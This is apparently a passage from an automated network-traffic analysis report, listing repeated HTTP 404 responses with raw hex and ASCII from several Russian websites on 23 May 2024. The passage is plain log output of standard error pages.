Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:02 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.3.2Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 30 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 8f e3 46 92 e0 e7 2e 60 fe 43 5a 46 bb 4b b6 28 91 d4 b3 aa ba ca eb 27 c6 c0 b8 c7 b0 3d 33 3b 70 37 04 8a 4c 49 ec a6 44 9a a4 4a 55 2e 17 b0 3b 73 b7 f7 e1 16 b7 38 60 bf dd 87 c5 fd 03 ef 60 06 f3 ba 99 fb 0b d5 ff e8 22 22 33 c9 24 45 3d aa 4a 65 cf e2 b6 1f 55 52 66 64 44 64 64 64 64 e4 2b f2 e9 1b 1f fe f4 83 2f 7f f9 d9 47 6c 9a ce 82 b3 83 a7 f8 8b 05 ce 7c 72 5a 8b 17 c6 e7 3f ab 61 1a 77 bc b3 83 47 4f 67 3c 75 98 3b 75 e2 84 a7 a7 b5 9f 7d f9 b1 31 a8 61 7a e0 cf 5f b1 98 07 a7 b5 28 0e c7 7e c0 6b 6c 1a f3 f1 69 6d 9a a6 51 72 dc 6a 4d 66 d1 a4 19 c6 93 d6 c5 78 de b2 ac 72 21 7f 3e 19 39 ee 2b bd 14 14 9a 87 e7 61 92 fa 86 b7 18 39 7e 33 5e b4 2e 66 41 1c b9 cd 68 1a 01 02 c0 90 fa 69 c0 cf 6e fe f7 eb 5f bd fe 87 9b ef 6e fe 72 f3 87 d7 ff 74 f3 1d 83 0f bf c3 1f df dd fc f1 e6 b7 37 bf c3 4f ec ad 37 07 b6 65 9f b0 9b 7f bb f9 eb eb 7f bc f9 33 24 ff 16 0b 20 e4 77 37 7f 02 0c bf 86 df 7f 7e fd cf 37 7f 79 fd df 45 f1 bf de fc 06 61 5f ff ea e6 0f ec e6 5f 21 ff df 11 e3 d3 96 a0 7a 20 84 31 77 66 fc f4 49 1c 8e c2 34 79 c2 dc 70 9e f2 79 7a fa 64 1e fa 73 8f 5f 34 d8 3c 1c 87 41 10 2e 9f b0 16 14 c9 aa fc c4 9b 27 46 04 95 e5 a9 3b 7d 22 aa fd 64 b5 c6 bb 95 1a 03 d5 a4 39 09 c3 49 c0 9d c8 4f 9a 6e 38 2b 95 ac 39 41 ca e3 b9 93 42 cb a4 97 11 87 84 28 0a 7c d7 49 fd 70 de 8a 93 e4 1d 90 2d 64 61 d5 4e 6b f7 16 12 7b 2b 76 be 5e 84 20 ee ff 85 f2 87 dc ef b6 b5 ed 98 73 af 55 fb 5b e3 9a dd fc 09 80 ff 0f fc 95 09 a0 68 80 f8 e6 37 db aa 03 4d 30 03 4d 48 2a eb f5 24 49 2f 03 9e 4c 39 4f 9f 30 df 3b 7d b2 8c 8c 51 10 ba af 8c c0 1f c5 4e 7c 69 b8 49 a2 da 77 1d 05 28 e3 cf dd 60 e1 f1 a4 05 e0 2d cf 4f d2 56 01 4b 8b c8 34 67 fe bc 09 00 ef 9e f3 f8 b4 d7 ec 36 db 4f 84 30 9f a4 fc 22 6d 11 a5 19 f7 7c e7 f4 89 13 04 42 6f a8 20 71 96 38 63 6e 24 e7 13 fa ef 83 7e 1b 94 07 a4 a1 36 5c f0 59 c2 76 76 d0 cc 4a b9 21 50 bd c2 2c c3 09 fc c9 fc d8 05 a1 f0 f8 ba 04 c1 f2 ef fe 3c f1 3d 7e 05 b5 89 02 e7 f2 58 d2 a1 7a 9d cc 9c 0b 63 e9 7b e9 f4 d8 32 cd c7 2b 48 e0 d3 d5 94 fb 93 69 4a f9 04 5e fe 9e 17 3f d1 30 1d 1c 3c 15 c2 2a d4 dd 0d 9c 24 f1 5d 23 9d f2 19 17 f5 4e 36 57 bc f5 f6 1b ec cb a9 9f 30 b4 81 0c 7e 3b 8b 34 34 26 7c ce 63 50 62 8f bd dd 3a 68 66 6d 3d 5a a4 69 38 1f 0e 51 2d ae dc 30 08 e3 e3 37 c7 e3 f1 09 5a c2 49 1c 2e e6 9e 21 53 db 76 bb df 76 4f 46 61 ec f1 d8 88 1d cf 5f 24 c7 47 f0 27 ba 80 c4 0b 23 99 3a 5e b8 3c 9e 87 73 7e Data Ascii: 308d}kF.`CZFK('=3;p7LIDJU.;s8``""3$E=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:04 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.3.2Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 30 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 8f e3 46 92 e0 e7 2e 60 fe 43 5a 46 bb 4b b6 28 91 d4 b3 aa ba ca eb 27 c6 c0 b8 c7 b0 3d 33 3b 70 37 04 8a 4c 49 ec a6 44 9a a4 4a 55 2e 17 b0 3b 73 b7 f7 e1 16 b7 38 60 bf dd 87 c5 fd 03 ef 60 06 f3 ba 99 fb 0b d5 ff e8 22 22 33 c9 24 45 3d aa 4a 65 cf e2 b6 1f 55 52 66 64 44 64 64 64 64 e4 2b f2 e9 1b 1f fe f4 83 2f 7f f9 d9 47 6c 9a ce 82 b3 83 a7 f8 8b 05 ce 7c 72 5a 8b 17 c6 e7 3f ab 61 1a 77 bc b3 83 47 4f 67 3c 75 98 3b 75 e2 84 a7 a7 b5 9f 7d f9 b1 31 a8 61 7a e0 cf 5f b1 98 07 a7 b5 28 0e c7 7e c0 6b 6c 1a f3 f1 69 6d 9a a6 51 72 dc 6a 4d 66 d1 a4 19 c6 93 d6 c5 78 de b2 ac 72 21 7f 3e 19 39 ee 2b bd 14 14 9a 87 e7 61 92 fa 86 b7 18 39 7e 33 5e b4 2e 66 41 1c b9 cd 68 1a 01 02 c0 90 fa 69 c0 cf 6e fe f7 eb 5f bd fe 87 9b ef 6e fe 72 f3 87 d7 ff 74 f3 1d 83 0f bf c3 1f df dd fc f1 e6 b7 37 bf c3 4f ec ad 37 07 b6 65 9f b0 9b 7f bb f9 eb eb 7f bc f9 33 24 ff 16 0b 20 e4 77 37 7f 02 0c bf 86 df 7f 7e fd cf 37 7f 79 fd df 45 f1 bf de fc 06 61 5f ff ea e6 0f ec e6 5f 21 ff df 11 e3 d3 96 a0 7a 20 84 31 77 66 fc f4 49 1c 8e c2 34 79 c2 dc 70 9e f2 79 7a fa 64 1e fa 73 8f 5f 34 d8 3c 1c 87 41 10 2e 9f b0 16 14 c9 aa fc c4 9b 27 46 04 95 e5 a9 3b 7d 22 aa fd 64 b5 c6 bb 95 1a 03 d5 a4 39 09 c3 49 c0 9d c8 4f 9a 6e 38 2b 95 ac 39 41 ca e3 b9 93 42 cb a4 97 11 87 84 28 0a 7c d7 49 fd 70 de 8a 93 e4 1d 90 2d 64 61 d5 4e 6b f7 16 12 7b 2b 76 be 5e 84 20 ee ff 85 f2 87 dc ef b6 b5 ed 98 73 af 55 fb 5b e3 9a dd fc 09 80 ff 0f fc 95 09 a0 68 80 f8 e6 37 db aa 03 4d 30 03 4d 48 2a eb f5 24 49 2f 03 9e 4c 39 4f 9f 30 df 3b 7d b2 8c 8c 51 10 ba af 8c c0 1f c5 4e 7c 69 b8 49 a2 da 77 1d 05 28 e3 cf dd 60 e1 f1 a4 05 e0 2d cf 4f d2 56 01 4b 8b c8 34 67 fe bc 09 00 ef 9e f3 f8 b4 d7 ec 36 db 4f 84 30 9f a4 fc 22 6d 11 a5 19 f7 7c e7 f4 89 13 04 42 6f a8 20 71 96 38 63 6e 24 e7 13 fa ef 83 7e 1b 94 07 a4 a1 36 5c f0 59 c2 76 76 d0 cc 4a b9 21 50 bd c2 2c c3 09 fc c9 fc d8 05 a1 f0 f8 ba 04 c1 f2 ef fe 3c f1 3d 7e 05 b5 89 02 e7 f2 58 d2 a1 7a 9d cc 9c 0b 63 e9 7b e9 f4 d8 32 cd c7 2b 48 e0 d3 d5 94 fb 93 69 4a f9 04 5e fe 9e 17 3f d1 30 1d 1c 3c 15 c2 2a d4 dd 0d 9c 24 f1 5d 23 9d f2 19 17 f5 4e 36 57 bc f5 f6 1b ec cb a9 9f 30 b4 81 0c 7e 3b 8b 34 34 26 7c ce 63 50 62 8f bd dd 3a 68 66 6d 3d 5a a4 69 38 1f 0e 51 2d ae dc 30 08 e3 e3 37 c7 e3 f1 09 5a c2 49 1c 2e e6 9e 21 53 db 76 bb df 76 4f 46 61 ec f1 d8 88 1d cf 5f 24 c7 47 f0 27 ba 80 c4 0b 23 99 3a 5e b8 3c 9e 87 73 7e Data Ascii: 308c}kF.`CZFK('=3;p7LIDJU.;s8``""3$E=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/8.3.2Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://novosti-dubai.ru/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 30 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 8f e3 46 92 e0 e7 2e 60 fe 43 5a 46 bb 4b b6 28 91 d4 b3 aa ba ca eb 27 c6 c0 b8 c7 b0 3d 33 3b 70 37 04 8a 4c 49 ec a6 44 9a a4 4a 55 2e 17 b0 3b 73 b7 f7 e1 16 b7 38 60 bf dd 87 c5 fd 03 ef 60 06 f3 ba 99 fb 0b d5 ff e8 22 22 33 c9 24 45 3d aa 4a 65 cf e2 b6 1f 55 52 66 64 44 64 64 64 64 e4 2b f2 e9 1b 1f fe f4 83 2f 7f f9 d9 47 6c 9a ce 82 b3 83 a7 f8 8b 05 ce 7c 72 5a 8b 17 c6 e7 3f ab 61 1a 77 bc b3 83 47 4f 67 3c 75 98 3b 75 e2 84 a7 a7 b5 9f 7d f9 b1 31 a8 61 7a e0 cf 5f b1 98 07 a7 b5 28 0e c7 7e c0 6b 6c 1a f3 f1 69 6d 9a a6 51 72 dc 6a 4d 66 d1 a4 19 c6 93 d6 c5 78 de b2 ac 72 21 7f 3e 19 39 ee 2b bd 14 14 9a 87 e7 61 92 fa 86 b7 18 39 7e 33 5e b4 2e 66 41 1c b9 cd 68 1a 01 02 c0 90 fa 69 c0 cf 6e fe f7 eb 5f bd fe 87 9b ef 6e fe 72 f3 87 d7 ff 74 f3 1d 83 0f bf c3 1f df dd fc f1 e6 b7 37 bf c3 4f ec ad 37 07 b6 65 9f b0 9b 7f bb f9 eb eb 7f bc f9 33 24 ff 16 0b 20 e4 77 37 7f 02 0c bf 86 df 7f 7e fd cf 37 7f 79 fd df 45 f1 bf de fc 06 61 5f ff ea e6 0f ec e6 5f 21 ff df 11 e3 d3 96 a0 7a 20 84 31 77 66 fc f4 49 1c 8e c2 34 79 c2 dc 70 9e f2 79 7a fa 64 1e fa 73 8f 5f 34 d8 3c 1c 87 41 10 2e 9f b0 16 14 c9 aa fc c4 9b 27 46 04 95 e5 a9 3b 7d 22 aa fd 64 b5 c6 bb 95 1a 03 d5 a4 39 09 c3 49 c0 9d c8 4f 9a 6e 38 2b 95 ac 39 41 ca e3 b9 93 42 cb a4 97 11 87 84 28 0a 7c d7 49 fd 70 de 8a 93 e4 1d 90 2d 64 61 d5 4e 6b f7 16 12 7b 2b 76 be 5e 84 20 ee ff 85 f2 87 dc ef b6 b5 ed 98 73 af 55 fb 5b e3 9a dd fc 09 80 ff 0f fc 95 09 a0 68 80 f8 e6 37 db aa 03 4d 30 03 4d 48 2a eb f5 24 49 2f 03 9e 4c 39 4f 9f 30 df 3b 7d b2 8c 8c 51 10 ba af 8c c0 1f c5 4e 7c 69 b8 49 a2 da 77 1d 05 28 e3 cf dd 60 e1 f1 a4 05 e0 2d cf 4f d2 56 01 4b 8b c8 34 67 fe bc 09 00 ef 9e f3 f8 b4 d7 ec 36 db 4f 84 30 9f a4 fc 22 6d 11 a5 19 f7 7c e7 f4 89 13 04 42 6f a8 20 71 96 38 63 6e 24 e7 13 fa ef 83 7e 1b 94 07 a4 a1 36 5c f0 59 c2 76 76 d0 cc 4a b9 21 50 bd c2 2c c3 09 fc c9 fc d8 05 a1 f0 f8 ba 04 c1 f2 ef fe 3c f1 3d 7e 05 b5 89 02 e7 f2 58 d2 a1 7a 9d cc 9c 0b 63 e9 7b e9 f4 d8 32 cd c7 2b 48 e0 d3 d5 94 fb 93 69 4a f9 04 5e fe 9e 17 3f d1 30 1d 1c 3c 15 c2 2a d4 dd 0d 9c 24 f1 5d 23 9d f2 19 17 f5 4e 36 57 bc f5 f6 1b ec cb a9 9f 30 b4 81 0c 7e 3b 8b 34 34 26 7c ce 63 50 62 8f bd dd 3a 68 66 6d 3d 5a a4 69 38 1f 0e 51 2d ae dc 30 08 e3 e3 37 c7 e3 f1 09 5a c2 49 1c 2e e6 9e 21 53 db 76 bb df 76 4f 46 61 ec f1 d8 88 1d cf 5f 24 c7 47 f0 27 ba 80 c4 0b 23 99 3a 5e b8 3c 9e 87 73 7e Data Ascii: 308d}kF.`CZFK('=3;p7LIDJU.;s8``""3$E=
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:48 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 41 4b c4 30 10 85 ef fd 15 e3 9e f4 b0 99 ba 74 c1 43 08 e8 b6 8b 0b 75 2d 9a 1e 3c 46 33 92 40 4d 6b 92 6e d5 5f 6f da 45 f0 32 f0 66 be 79 bc c7 2f ca c7 9d 7c 69 2a b8 97 0f 35 34 ed 5d 7d d8 c1 6a 8d 78 a8 e4 1e b1 94 e5 f9 b2 61 39 62 75 5c 89 8c 9b f8 d1 09 6e 48 e9 24 a2 8d 1d 89 22 2f e0 d8 47 d8 f7 a3 d3 1c cf cb 8c e3 02 f1 d7 5e 7f cf 7f d7 e2 1f 93 54 c6 07 21 0d 81 a7 cf 91 42 24 0d ed 53 0d 93 0a e0 12 f7 3e 73 d0 3b 88 c6 06 08 e4 4f e4 19 c7 61 76 f2 69 28 ad 3d 85 20 6e 07 f5 66 08 37 ac 60 db 2d 5c b6 ce 7e 5d c1 f3 82 83 8a 30 4d 13 d3 27 fb 63 c8 59 5a 0f aa eb 28 32 3f 42 d3 fb 08 37 39 c7 3f 9f 14 77 09 9a a2 cd 05 b3 5f 16 91 e4 31 1b 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: edMAK0tCu-<F3@Mkn_oE2fy/|i*54]}jxa9bu\nH$"/G^T!B$S>s;Oavi(= nf7`-\~]0M'cYZ(2?B79?w_10
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx-reuseport/1.21.1Date: Thu, 23 May 2024 13:21:53 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 283Connection: closeVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 76 69 7a 68 65 6e 69 65 2d 70 61 6c 6c 65 74 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.dvizhenie-pallet.ru Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:00 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:03 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:06 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 13:22:08 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 23 May 2024 13:22:43 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 